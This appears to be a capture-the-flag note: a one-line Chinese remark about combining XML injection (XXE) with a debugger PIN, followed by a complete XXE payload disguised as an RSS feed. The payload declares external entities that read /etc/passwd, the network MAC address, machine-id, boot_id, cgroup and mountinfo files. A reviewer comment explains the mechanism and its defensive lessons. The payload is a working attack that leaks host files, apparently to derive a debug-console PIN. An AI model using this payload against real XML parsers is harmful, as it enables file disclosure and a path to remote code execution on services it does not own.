就是 XML 注入（XXE）加 PIN，被 docker 版本坑了一回。
<?xml version="1.0" encoding="utf-8"?>
<!--
  Reviewer note: the internal DTD subset below declares SYSTEM entities that point
  at local files. Only a parser that resolves external entities will substitute
  those files into the <title> text; a consumer with DOCTYPE/DTD processing and
  external-entity resolution disabled leaves the references unresolved or rejects
  the document outright. A DOCTYPE inside an RSS feed is itself a detection signal.
  Each <item> title pairs a bracketed path with the entity that reads it, so the
  rendered feed acts as a labelled dump of those files. The page note mentions
  "pin"; the chosen paths look like host-identity inputs a debugger PIN would be
  derived from (inferred, confirm) - if so, the defensive takeaway is that a debug
  console must never be reachable in a deployed service.
  <!ELEMENT name ANY> is unused filler: no <name> element occurs in the body.
-->
<!DOCTYPE xxe [
  <!ELEMENT name ANY >
  <!ENTITY xxe_1 SYSTEM "file:///etc/passwd" >
  <!ENTITY xxe_2 SYSTEM "file:///sys/class/net/eth0/address" >
  <!ENTITY xxe_3 SYSTEM "file:///etc/machine-id" >
  <!ENTITY xxe_4 SYSTEM "file:///proc/sys/kernel/random/boot_id" >
  <!ENTITY xxe_5 SYSTEM "file:///proc/self/cgroup" >
  <!ENTITY xxe_6 SYSTEM "file:///proc/self/cgroup2" >
  <!ENTITY xxe_7 SYSTEM "file:///proc/self/mountinfo" >
]>
<rss version="2.0">
  <channel>
    <title>XXE</title>
    <link>http://www.example.com</link>
    <description>This is a sample RSS feed</description>
    <!-- Title text is kept on one line: whitespace inside <title> is data. -->
    <item>
      <title>[/etc/passwd] &xxe_1;</title>
      <link>ext</link>
    </item>
    <item>
      <title>[/sys/class/net/eth0/address] &xxe_2;</title>
      <link>ext</link>
    </item>
    <item>
      <title>[/etc/machine-id] &xxe_3;</title>
      <link>ext</link>
    </item>
    <item>
      <title>[/proc/sys/kernel/random/boot_id] &xxe_4;</title>
      <link>ext</link>
    </item>
    <item>
      <title>[/proc/self/cgroup] &xxe_5;</title>
      <link>ext</link>
    </item>
    <item>
      <title>[/proc/self/cgroup2] &xxe_6;</title>
      <link>ext</link>
    </item>
    <item>
      <title>[/proc/self/mountinfo] &xxe_7;</title>
      <link>ext</link>
    </item>
  </channel>
</rss>